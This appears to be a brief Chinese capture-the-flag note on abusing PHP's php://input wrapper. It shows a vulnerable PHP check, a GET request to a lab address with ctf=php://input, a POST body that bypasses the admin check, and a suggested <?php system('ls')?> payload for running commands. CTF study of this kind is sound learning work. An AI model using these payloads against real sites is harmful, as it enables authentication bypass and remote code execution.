php://input php伪协议 

简单来说POST请求的情况下，php://input可以获取到post的数据。

代码

$user = $_GET["ctf"];  
$file = $_GET["file"];  

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){  
    echo "hello admin!<br>";
    echo $flag;
}else{  
    echo "you are not admin ! ";  
}  
 -->  

过滤方法

get 中   http://10.2.0.28/25/index.php?ctf=php://input&&file=index.php

POST 中   the user is admin

还可以在post中添加 <?php system('ls')?>查看目录



